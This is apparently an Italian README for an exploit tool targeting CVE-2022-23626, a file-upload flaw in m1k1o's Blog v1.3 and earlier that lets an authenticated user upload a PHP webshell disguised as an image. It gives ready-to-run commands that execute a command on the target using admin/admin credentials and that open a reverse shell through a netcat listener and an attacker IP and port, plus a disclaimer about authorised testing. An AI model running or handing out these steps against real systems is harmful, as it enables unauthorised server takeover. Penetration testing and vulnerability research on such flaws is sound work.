
Esecuzione di codice remoto autenticata tramite una vulnerabilità di caricamento file in Blog di m1k1o v1.3 e versioni precedenti.
L'endpoint ajax.php?action=upload_image non valida correttamente i tipi di file caricati, consentendo a un utente autenticato di caricare una webshell PHP camuffata da immagine. L'attaccante può quindi attivare l'esecuzione richiedendo direttamente il file caricato.
requestspip install requests
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"
Avvia prima un listener:
nc -lnvp 4444
Poi esegui:
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444
Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi educativi. Utilizzalo solo su sistemi per i quali hai esplicita autorizzazione a testare.